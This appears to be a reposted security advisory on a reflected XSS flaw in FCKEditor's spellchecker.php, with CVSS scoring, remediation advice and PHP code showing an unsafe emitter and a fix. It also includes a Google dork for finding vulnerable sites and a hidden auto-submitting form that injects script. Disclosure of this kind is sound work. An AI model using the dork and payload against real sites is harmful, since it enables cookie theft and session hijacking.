FCKEditor <= 2.6.7 reflected XSS vulnerability

2012-06-26 / 2012-08-15
Credit: Emilio Pinna
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Product: FCKEditor
# Vendor site: http://ckeditor.com/
# Affected versions: FCKEditor <= 2.6.7
# Product description: WYSIWYG Text and HTML Editor for the Web
# Author: Emilio Pinna - ncl 01 _at_ email _dot_ it
# Blog site: http://disse.cting.org
# Date: 13/06/2012

This software is popular as a stand-alone application, as a WordPress/Joomla/Drupal extension, and as the embedded editor of many web applications. Development was discontinued in 2009, but the software had spread for more than six years and Google counts more than 1.5 billion results. A plausible Google dork, filtering out PHP sources, could be:

# inurl:fck_spellerpages/spellerpages/server-scripts/ -"The following variables"

The file "spellchecker.php" suffers from an XSS vulnerability at line 27. Attackers can exploit this weakness to execute arbitrary HTML and script code in the browser session of a user who visits the resulting page, leading to cookie theft and bypass of admin access controls. The exploit is CSRF-like, because the vulnerable parameter is sent via POST.

#--------- File: fsck_editor.html -----------#
```html
<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
<form method="post" name="sender" action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" target="hidden">
<input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' />
</form>
</body>
<script>document.sender.submit(); </script>
</html>
```
#-----------------------------------------------------#
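The following PHP is an added example, not FCKeditor's own code and not part of the advisory. It contrasts the unsafe pattern the advisory describes (a POSTed `textinputs[]` value copied verbatim into a JavaScript string literal inside a `<script>` block) with a hardened emitter that serialises each value with `json_encode` and the `JSON_HEX_*` flags. The function names `emit_textinputs_unsafe` and `emit_textinputs_safe`, and the simplified structure of the output, are assumptions; the actual contents of spellchecker.php line 27 are not reproduced here.

```php
<?php
// Added example (not FCKeditor's code). Function names and the simplified
// output structure are assumptions; the real spellchecker.php differs.

// Unsafe pattern (illustrative reconstruction of the flaw the advisory
// describes, not the actual line 27): the value is interpolated into a JS
// string literal, so a quote in the input ends the literal and the rest of
// the input is parsed as script.
function emit_textinputs_unsafe(array $textinputs): string {
    $out = "<script type=\"text/javascript\">\n";
    foreach ($textinputs as $i => $val) {
        $out .= "textinputs[$i] = decodeURIComponent(\"" . $val . "\");\n";
    }
    return $out . "</script>\n";
}

// Hardened emitter: json_encode with JSON_HEX_* turns ", ', <, > and & into
// \u0022, \u0027, \u003C, \u003E and \u0026, and escapes / as \/ by default,
// so no input can terminate the string literal or the <script> element.
function emit_textinputs_safe(array $textinputs): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $out = "<script type=\"text/javascript\">\n";
    // array_values() guarantees integer indexes that we, not the client, choose.
    foreach (array_values($textinputs) as $i => $val) {
        // Reject anything that is not a plain string (nested arrays, objects).
        if (!is_string($val)) {
            throw new InvalidArgumentException("textinputs[$i] must be a string");
        }
        $json = json_encode($val, $flags);
        if ($json === false) {
            // Invalid UTF-8: refuse rather than emit a partially encoded value.
            throw new InvalidArgumentException("textinputs[$i] is not valid UTF-8");
        }
        $out .= "textinputs[$i] = $json;\n";
    }
    return $out . "</script>\n";
}

// Constructed sample input: the string from the advisory's proof of concept,
// as it would arrive in $_POST['textinputs'].
$sample = ['");alert("THIS SITE IS XSS VULNERABLE!");</script><!--'];

echo "--- unsafe ---\n", emit_textinputs_unsafe($sample);
echo "--- safe ---\n",   emit_textinputs_safe($sample);
// In the hardened output the value becomes a single JS string literal:
// textinputs[0] = "\u0022);alert(\u0022THIS SITE IS XSS VULNERABLE!\u0022);\u003C\/script\u003E\u003C!--";
```

Encoding at the point of output into the JavaScript context is the fix; neither `stripslashes` nor `htmlspecialchars` alone is sufficient, because the value lands inside a script block rather than in HTML text. The `is_string` check also closes the gap where `textinputs[]` is posted as a nested array and the interpolation yields `Array` or a notice instead of the expected string.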

References:

http://ckeditor.com/
http://disse.cting.org


Copyright 2024, cxsecurity.com